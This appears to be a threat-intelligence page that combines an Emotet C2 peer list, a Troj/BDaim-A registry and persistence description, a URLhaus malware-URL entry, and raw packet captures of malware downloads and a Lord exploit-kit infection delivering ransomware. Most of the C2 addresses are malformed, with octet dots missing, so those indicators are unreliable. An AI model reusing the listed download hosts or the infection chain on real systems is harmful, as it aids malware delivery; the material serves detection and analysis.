Text Example

Updated List of Emotet Banking Malware Trojan IP C2 Servers and Port Numbers

Emotet

Peers:
104.131.58132:8080
104.236.13772:8080
109.169.8613:8080
110.170.65146:80
111.125.7122:8080
112.218.134227:80
113.61.76239:80
116.48.138115:80
116.48.14832:80
118.36.70245:80
119.59.124163:8080
125.99.61162:7080
130.204.247253:80
138.68.1064:7080
139.162.11888:8080
14.160.93230:80
142.127.5763:8080
142.93.114137:8080
144.139.56105:80
144.217.117207:8080
149.62.173247:8080
151.237.36220:80
152.170.10899:443
159.203.204126:8080
163.172.40218:7080
165.228.19593:80
175.114.17883:443
178.79.163131:8080
181.198.20345:443
181.36.42205:443
181.61.143177:80
183.99.239141:80
185.160.2123:80
185.160.22926:80
185.86.148222:8080
186.15.8352:8080
186.68.48204:443
187.188.166192:8080
188.135.1549:80
188.216.24204:80
189.19.81181:443
190.100.153162:443
190.146.131105:8080
190.186.16423:80
190.195.129227:8090
190.210.184138:995
190.6.193152:8080
190.97.30167:990
191.103.7634:443
191.183.21190:80
192.241.14684:8080
2.139.158136:443
2.42.173240:80
2.44.16752:80
2.45.112134:80
200.119.11118:443
200.124.22532:80
200.58.83179:80
201.213.3259:80
203.130.069:80
203.25.1593:8080
207.154.20440:8080
212.237.5061:8080
212.71.237140:8080
217.199.160224:8080
219.75.66103:80
223.255.148134:80
37.120.185153:443
37.183.12132:80
37.187.663:8080
37.211.49127:80
45.50.177164:80
45.79.95107:443
45.8.136201:80
46.101.212195:8080
46.28.111142:7080
5.196.35138:7080
5.32.41106:80
5.88.2767:8080
50.28.51143:8080
51.255.165160:8080
58.171.3826:80
62.75.143100:7080
62.75.160178:8080
63.246.252234:80
63.248.1988:80
68.129.203162:443
68.174.15223:80
68.183.170114:8080
68.183.190199:8080
68.187.16028:443
69.163.3384:8080
72.29.55174:80
73.60.8210:80
74.59.18794:80
74.79.10355:80
77.27.22124:443
77.55.21177:8080
79.7.1141:80
80.11.15865:8080
81.157.23490:8080
82.196.15205:8080
82.36.10314:80
82.8.23251:80
83.165.78227:80
83.248.141198:80
85.152.208146:80
85.234.14394:8080
86.42.166147:80
87.106.46107:8080
87.106.7740:7080
91.117.8359:80
91.204.16319:8090
91.205.21557:7080
91.74.17546:80
91.83.93124:7080
93.144.22657:80
93.148.25290:80
93.67.154252:443
94.200.114162:80
96.126.12164:443
96.38.23410:80
96.61.113203:80
97.120.32227:80
97.81.12153:80
99.252.276:80

Trojan Malware BDaim-A is c000.exe vbc.exe Malicious X.509 SSL Certificate PCAP File Download Traffic Sample

Troj/BDaim-A is a backdoor trojan.

The Trojan installs itself as uvwxyz.exe in system folder of Windows and creates the following files, also in the system folder:

mswinsck.ocx (This is clean microsoft socket control)
raim.ocx

Troj/BDaim-A creates the following registry entry so that it automatically starts up with Windows:

HKLM\Software\Microsoft\Windows\CurrentVersion\Run\uvwxyz = C:\WINDOWS\System32\uvwxyz.exe

In addition, Troj/BDaim-A creates the following registry entries:

HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Host = “localhost”
HKCU\Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Server\Port = dword:0000103f
HKCU\Software\Microsoft\Visual Basic\
HKCU\Software\Microsoft\Visual Basic\6.0\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) (default) = “Microsoft WinSock Control, version 6.0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Control\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A52-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A53-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(0DE86A57-2BAA-11CF-A229-00AA003D7352)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(40FC6ED4-2438-11CF-A3DB-080036F12502)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Implemented Categories(40FC6ED5-2438-11CF-A3DB-080036F12502)\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\ThreadingModel = “Apartment”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus(default) = “0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\1\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \MiscStatus\1(default) = “132497”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ProgID\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ProgID(default) = “MSWinsock.Winsock.1”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Programmable\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ToolboxBitmap32\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \ToolboxBitmap32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX, 1”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Version\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \Version(default) = “1.0”
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \VersionIndependentProgID\
HKCR\CLSID(248DD896-BB45-11CF-9ABC-0080C7E7B78D) \VersionIndependentProgID(default) = “MSWinsock.Winsock”
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) (default) = “Winsock General Property Page Object”
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32\
HKCR\CLSID(248DD897-BB45-11CF-9ABC-0080C7E7B78D) \InprocServer32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) (default) = “IMSWinsockControl”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid(default) = “(00020424-0000-0000-C000-000000000046)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32(default) = “(00020424-0000-0000-C000-000000000046)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\Interface(248DD892-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\Version = “1.0”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) (default) = “DMSWinsockControlEvents”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid(default) = “(00020420-0000-0000-C000-000000000046)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \ProxyStubClsid32(default) = “(00020420-0000-0000-C000-000000000046)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib(default) = “(248DD890-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\Interface(248DD893-BB45-11CF-9ABC-0080C7E7B78D) \TypeLib\Version = “1.0”
HKCR\MSWinsock.Winsock\
HKCR\MSWinsock.Winsock(default) = “Microsoft WinSock Control, version 6.0”
HKCR\MSWinsock.Winsock.1\
HKCR\MSWinsock.Winsock.1(default) = “Microsoft WinSock Control, version 6.0”
HKCR\MSWinsock.Winsock.1\CLSID\
HKCR\MSWinsock.Winsock.1\CLSID(default) = “(248DD896-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\MSWinsock.Winsock\CLSID\
HKCR\MSWinsock.Winsock\CLSID(default) = “(248DD896-BB45-11CF-9ABC-0080C7E7B78D)”
HKCR\MSWinsock.Winsock\CurVer\
HKCR\MSWinsock.Winsock\CurVer(default) = “MSWinsock.Winsock.1”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D)\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0(default) = “Microsoft Winsock Control 6.0 (SP5)”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\win32\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\0\win32(default) = “C:\WINDOWS\System32\MSWINSCK.OCX”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\FLAGS\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\FLAGS(default) = “2”
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\HELPDIR\
HKCR\TypeLib(248DD890-BB45-11CF-9ABC-0080C7E7B78D) \1.0\HELPDIR(default) = “”

URLhaus Database

You are currently viewing the URLhaus database entry for http://f0384177.xsph.ru/LO/c000.exe which is being or has been used to serve malware. Please consider that URLhaus does not differentiate between websites that have been compromised by hackers and such that has been setup by cybercriminals for the sole purpose of serving malware.

Database Entry


ID:286246
URL: http://f0384177.xsph.ru/LO/c000.exe
URL Status:Offline
Host: f0384177.xsph[.]ru
Date added:2020-01-11 10:33:04 UTC
Threat: Malware download

2020-01-16 06:45:23.373218 IP 192.168.86.25.56261 > 151.80.241.110.80: Flags [P.], seq 1:432, ack 1, win 16425, length 431: HTTP: GET /mich/vbc.exe HTTP/1.1
E….q@…S/..V..P.n…P…*.WWkP.@).A..GET /mich/vbc.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: windowsdefenderserversecureserver.duckdns.org
Connection: Keep-Alive

2020-01-16 06:45:23.474701 IP 151.80.241.110.80 > 192.168.86.25.56261: Flags [.], seq 1:1461, ack 432, win 513, length 1460: HTTP: HTTP/1.1 200 OK
E…..@.p.N..P.n..V..P…WWk….P…d…HTTP/1.1 200 OK
Date: Thu, 16 Jan 2020 11:45:23 GMT
Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
Last-Modified: Thu, 16 Jan 2020 04:32:10 GMT
ETag: “16ea00-59c3a4efb28b9”
Accept-Ranges: bytes
Content-Length: 1501696
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload

MZ………………….@……………………………………… .!..L.!This program cannot be run in DOS mode..

2020-01-16 06:45:52.794502 IP 192.168.86.25.56262 > 141.8.192.151.80: Flags [P.], seq 1:402, ack 1, win 16425, length 401: HTTP: GET /LO/c000.exe HTTP/1.1
E…..@….
..V……..PU.wZ.^3eP.@)….GET /LO/c000.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: f0384177.xsph.ru
Connection: Keep-Alive

2020-01-16 06:45:52.966457 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], ack 402, win 237, length 0
E..(J>@.+..0……V..P…^3eU.x.P………….
2020-01-16 06:45:53.040728 IP 141.8.192.151.80 > 192.168.86.25.56262: Flags [.], seq 1:1461, ack 402, win 237, length 1460: HTTP: HTTP/1.1 503 Service Unavailable
E…J?@.+..{……V..P…^3eU.x.P…….HTTP/1.1 503 Service Unavailable
Server: openresty
Date: Thu, 16 Jan 2020 11:45:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

2806



…….. …….. ……………………

<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta name="viewport" content="width=device-width, initial-scale=1" />
<meta http-equiv="X-UA-Compatible" content="IE=edge" />

<link rel="stylesheet" type="text/css" href="https://index.from.sh/fonts.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/index.css?10" />
<link rel="stylesheet" type="text/css" href="https://index.from.sh/stub.css?10" />

2020-01-16 06:45:53.391894 IP 192.168.86.25.56265 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….|..V….”…. …Ae=
P.@)D…….y…u..^..S:i0..Z..o..i…..\c/u.E~ ……./.5…
….. .
.2.8…….4…………..index.from.sh……….
…………..
2020-01-16 06:45:53.392017 IP 192.168.86.25.56266 > 141.8.197.34.443: Flags [P.], seq 1:127, ack 1, win 16425, length 126
E…..@….{..V….”….Py.*:..kP.@)$-……y…u..^..S ..mX..x.C+)8.w<.J..6-….U;…./.5… ….. . .2.8…….4…………..index.from.sh………. ………….. 2020-01-16 06:45:53.528765 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], ack 127, win 229, length 0
E..(.8@.+……”..V………….P….0……..
2020-01-16 06:45:53.530363 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1:1461, ack 127, win 229, length 1460
E….9@.+……”..V………….P…/…….Y…U…at7.GRB..V.b…-.IK[Gs..&s…hO /.NQ….|.wX……v….E..c.A”.F…………………………..q0..m0..U…….. .b.h5.?…….0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U.
..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0…180312000000Z..200311235959Z0s1!0…U….Domain Control Validated1 0…U….Hosted by OnlineNic Inc1.0…U….PositiveSSL1.0…U….index.from.sh0..”0.. *.Hs………….0..
……..2Y
2s..v@…………..h2.m}..(.6...&......?s...Z).:....C..:....i.....-.E.r..]....e.6j.....;>...>.[.....5P[ .[.n....:..4. ...S...k...........?x......_...+..b.QU$1..Q..@...F....e&..."...^.....o3....f........g...4......smX>h...d....b!C.;. .G....P5.l.X............0...0...U.#..0.....j:.Z.....Vs.C.:(..0...U.......#k..=.k....R.$.E...0...U...........0...U.......0.0...U.%..0...+.........+.......0O..U. .H0F0:..+.....1....0+0)..+.........https://secure.comodo.com/CPS0...g.....0T..U...M0K0I.G.E.Chttp://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0....+........y0w0O..+.....0..Chttp://crt.comodoca.com/COMODORSADomainValidationSecureServerCA.crt0$..+.....0...http://ocsp.comodoca.com0+..U...$0"..index.from.sh..www.index.from.sh0.. *.H.............c-.[.....p5..(]n.....-..2}.. .A(.?..'...O.,.X2.5d.4N.f.m......7..............Y>.X..G.F-....D.v....&Y....Y%......l.Cq...*1&.D.....>6.S...(>.....~!....Fs....C.39*.....p.k....u....h...A....Y...gmX............<M.p...gr 2020-01-16 06:45:53.530672 IP 141.8.197.34.443 > 192.168.86.25.56267: Flags [.], seq 1461:2921, ack 127, win 229, length 1460 E....:@.+......"..V........}....P.......[.Y....Y.V....%..<…..pm.Zl…..)s….C….0…0……….+.n..u6l..n..|..0.. *.H……..0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1+0)..U…”COMODO RSA Certification Authority0…140212000000Z..290211235959Z0..1.0 ..U….GB1.0…U….Greater Manchester1.0…U….Salford1.0…U. ..COMODO CA Limited1604..U…-COMODO RSA Domain Validation Secure Server CA0..”0.. .H………….0.. ………..Y..85.,….I.d..b.E.:………..mw……..>….I…..K.. …^e.>..L…E^R/4.H$d.A…..g…z.S.;|…Uo.G |..”……W.p.`…-……..{...(!.Mo.O%..z5.&.F…Y5..N.CP?Y..lQ!.X…uPx>L…..k…;…R…$.n.’QE.p.%C…J…~..m…’s].E0….A…D………………..e0..a0…U.#..0…..~.=…<….8…22.0…U……..j:.Z…..Vs.C.:(..0…U………..0…U…….0…….0…U.%..0…+………+…….0…U. ..0.0…U. .0…g…..0L..U…E0C0A.?.=.;http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q..+……..e0c0;..+…..0../http://crt.comodoca.com/COMODORSAAddTrustCA.crt0$..+…..0…http://ocsp.comodoca.com0.. *.H………….N+vO..b6..w.’….D…>..ff.>.I..5…….5..6.u…Pr|..w….. ..g..V.{.D.B..]..PF….Yl…….:B…K4{‘;..o$;r.ctX<.l?O…….7

Lord Exploit Kit Exploiting Flash Vulnerability Delivering Eris Ransomware PCAP File Download Traffic Sample

2019-08-02 10:46:29.501586 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E..m.y@…..
..e…….PM….Hg.P…….GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 57189bbb.ngrok.io

2019-08-02 10:46:29.501716 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 326, win 64240, length 0
E..(……U…..
..e.P…Hg.M..$P…l…
2019-08-02 10:46:29.666953 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………PB….
..e.P…Hg.M..$P…….HTTP/1.1 200 OK
Date: Fri, 02 Aug 2019 14:46:29 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91




2019-08-02 10:46:31.239216 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [.], ack 21872, win 64240, length 0
E..(..@…..
..e…….PM….H.tP…….
2019-08-02 10:46:31.297932 IP 10.8.2.101.49160 > 3.14.212.173.80: Flags [P.], seq 1799:2571, ack 21872, win 64240, length 772: HTTP: GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
E..,..@…..
..e…….PM….H.tP…OC..GET /?jS3YdHCaSi9dJ.swf HTTP/1.1
Accept: /
Accept-Language: en-US
Referer: http://57189bbb.ngrok.io/?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3
x-flash-version: 28,0,0,161
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:46:31.298032 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], ack 2571, win 64240, length 0
E..(……U…..
..e.P…H.tM…P…….
2019-08-02 10:46:31.441240 IP 3.14.212.173.80 > 10.8.2.101.49160: Flags [.], seq 21872:23332, ack 2571, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E………P…..
..e.P…H.tM…P…+…HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Date: Fri, 02 Aug 2019 14:46:30 GMT
Transfer-Encoding: chunked

2475
FWS$u$..x……p…..D………..application/x-shockwave-flashAdobe Flex 4 Applicationhttp://www.adobe.com/products/flexujwkgkcujwkgkcENSep 15, 2014.D…<.C….Z
………..Z……….e….

2019-08-02 10:47:11.656373 IP 10.8.2.101.49175 > 3.14.212.173.80: Flags [P.], seq 1:724, ack 1, win 64240, length 723: HTTP: GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
E…..@…..
..e…….PjTPv….P…>…GET /?Jm5Y8u9PbIbEe7ixQSNsYv3ZAMQOXJ1MNlWYeXp4OcS42lGGsTC1nrxn7Bs2nqx3 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 57189bbb.ngrok.io
DNT: 1
Connection: Keep-Alive
Cookie: session=MTU2NDc1NzE5MHxEdi1CQkFFQ180SUFBUkFCRUFBQV82UF9nZ0FFQm5OMGNtbHVad3dGQUFORFZrVUdjM1J5YVc1bkRBOEFEVU5XUlMweU1ERTRMVFE0TnpnR2MzUnlhVzVuREFVQUEweE9Td1p6ZEhKcGJtY01KZ0FrYUhSMGNEb3ZMemd4TGpFM01TNHpNUzR5TkRjNk5EVTJOeTlUWlhKMlpYSXVaWGhsQm5OMGNtbHVad3dGQUFORldGUUdjM1J5YVc1bkRBVUFBMU5YUmdaemRISnBibWNNQlFBRFEwWkhCbk4wY21sdVp3d0pBQWRGV0ZCTVQwbFV8UvNtvJ8thZ9a7XPixQ5K3TO4K2XLuH7VZ0nrU5jUKqU=

2019-08-02 10:47:11.656449 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [.], ack 724, win 64240, length 0
E..(.R….PV….
..e.P……jTSIP….a..
2019-08-02 10:47:11.842604 IP 3.14.212.173.80 > 10.8.2.101.49175: Flags [P.], seq 1:189, ack 724, win 64240, length 188: HTTP: HTTP/1.1 302 Found
E….T….O…..
..e.P……jTSIP…I…HTTP/1.1 302 Found
Content-Type: text/html; charset=utf-8
Location: http://google.com
Date: Fri, 02 Aug 2019 14:47:11 GMT
Content-Length: 40

Found.

2019-08-02 10:46:31.800847 IP 10.8.2.101.49164 > 81.171.31.247.4567: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E…..@…{.
..eQ……….`.2.”P….+..GET /Server.exe HTTP/1.1
User-Agent: wininet
Host: 81.171.31.247:4567
DNT: 1
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-02 10:46:31.800983 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], ack 133, win 64240, length 0
E..(……..Q…
..e…..2.”….P…G…
2019-08-02 10:46:31.977210 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [P.], seq 1:326, ack 133, win 64240, length 325
E..m……..Q…
..e…..2.”….P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 1803776
Accept-Ranges: bytes
Server: HFS 2.3m
Set-Cookie: HFS_SID_=0.176216669380665; path=/; HttpOnly
ETag: 60A4822263437E51F0D4844D638C4DFA
Last-Modified: Fri, 02 Aug 2019 12:38:10 GMT
Content-Disposition: attachment; filename=”Server.exe”;

2019-08-02 10:46:34.864608 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 601786:603246, ack 133, win 64240, length 1460
E………..Q…
..e…..;……P……..l..Sam9..".P.s...Y.\.D3....rU......}ZZs.>.….h.(…ax….2.9…Y..A… …….-…..,..|..X.s.@. .. ].....+<.%.p!.q.DD..I..,...x.5.XL..+D... a\....iN.e.L P.B.#%p………..Cg…e…J.i.>…..t….B…..% …..K……l..2…..X.L..9.A…..U.z.$4E1..1..#?.%..I(…C..……K..x…….ax|’S.....<.6.T...e........Q:D.....e..w.....O..g".(.....J.....c…/….$,#GL..I.,.’P..9.;..uC. ….@kB.. E..p.g(0’Hu.=…….. &P..I}………….!g…n..$.(.i….,@5i.dD…..5..}..cm$#.R.. …{..L.?4…3……@Qe…b…g…N..!C….D..M.F…v.0. S.Z….. …..E=. …F.]…M.L..&.4..5..)..f.M.yE.X.h…..SP…;…….Er..?…,…..N..~?T’Q..;..hA)…”….E…-…….B^….KR.H. ..Z..M…..L8………G..8.p.S..[………0.~~….h….:.u3..U)A.H……p!..4D9.z@h.BG.V..Z-…I.,.. .p….[j…..9..i….<.=..8I….R.~. ..e..m0]..4/..0…..#….Yu….E….I…N.Y.4……..J… E.J.[).(-..QD..n..Ko…,W..>=.+610..M.=(Y/fk.Ys…f…,)……3 z@.V..)..)……..!.-9Z..O.1….u.C..Y…f{….5….J…..F…Y..8…^. .A……….#…….7/.cW………….n…L..K……...b..t.;.p..T....\.,....(,.*..y..9./..Mli.c...[...$G^.f...(..XOo...k....X.A;.1: P...mNqB....=..e... ....s..: ...'.%[.T..|7.pUG…6…..P.u…..1(ob(.!{……T..L….Tz……..I……Y….I….V..tMT..G;.k..5t.a.I.|X P:AC’.G.[..c…j…….W…u…..!2e.@…A..0Pnk…RI.8….i….
O.[……
x|u..&.@+<..T.k@D.T,…….6@.r.,.7.>..DHc….J.uB….%.Z.B…t.(4…A…X7…….@q].…B[D…cU… 2019-08-02 10:46:34.864636 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 603246:604706, ack 133, win 64240, length 1460 E………..Q… ..e…..;……P………. 54+0………L>……7Z…..%..m..Aj…I.TB..BM……L.p…. [.. …….m….1.jc…..|)J………n…k.S.y…..a.f..#,…..~.$..G.y.*2+.G.....S.z$E..~l....4P....U.LD.0X.\.C!.\> WRl......Xr...,... ..i..4J....UEHX_....R...H$.... BP..8.M$.o..0TEH_'...U....l...ri&..l…e…”$,b….j..” .L….[.. ……[F..l.K………^..T.2…D”.?.a!B…i…
/A.&7.EPG..a.B 8….* ..D:….A…&..s$ ..’. /...0).W.2...t*..E..3Z.)..7..8B...".5..1.8.*%L1....v..A.`.5.EIX......\P..<...@.t@...QC.u8 ..C.K..t0.0..M..V.rm...) ......G#...X.iv_.)+/<..u.%I.x.p....!,yQ/..R0.G..`...60.$Q.@N.....1y.;.. .4.....j...L.Cb.,.~2.......$;t.Q...w..@...!.d...*K.@f..[:.A..V..7.........A..... ...[...BJ.#....p.....Z 5_.4.2$........ttpP..W."s....w.S.. .y.Y36.xK.......:.\.....-.....7*.... .....!p.:!...R.i#,....92.d.C.......x...".......d.V..u....),"%.h]...a0..D....\..)..@aSS!t.4..V.(..04......[...IR@..H.!.F. .k]X.?.9..$...g.R.....-.3(.I...1 ..#&.@...i...b.B\%/.6.C..g...n..tEC6.>....t.A..t.fW........ockdC.Q.f bk...5.....?s..<.<....:..eJ_.9u.,.l.R..L...3.....Q..P.\.&..EX........OJ......e$3$...v|..3.hT..&._.-..,Q..m......e.. ..Z.L..m.ziv..X......o.7..5)=ls./;s..4ia...{QKD9.}R$ (.4..f.......Q..@.C..$M,...!....R#.. `_.....4[0..d )~......wH.6.$.S<,....C...,.y.gllll........M.P.3..). ..H....EZ.o {.$..T1...u..............$......C......M..A?.l..kO.QcK.C..S........ .#.$...?.(.0.s({.p..H.QB.....L.A.........B.<.5UCa.T.k$.k..C.=diMY...!Enq.h.GH1...,.\H"...u*.Q)....|.,......L....c.. M.E. 2019-08-02 10:46:34.864652 IP 81.171.31.247.4567 > 10.8.2.101.49164: Flags [.], seq 604706:606166, ack 133, win 64240, length 1460 E...........Q... ..e.....;.C....P.......q.Y,2,\..$..Dl...@6.P.......*T...u.+L....E.0.(...(..(.".... . )...X.H......`Z!`=.....M.M,..ahI\.. .]. #P.Yw...0... j 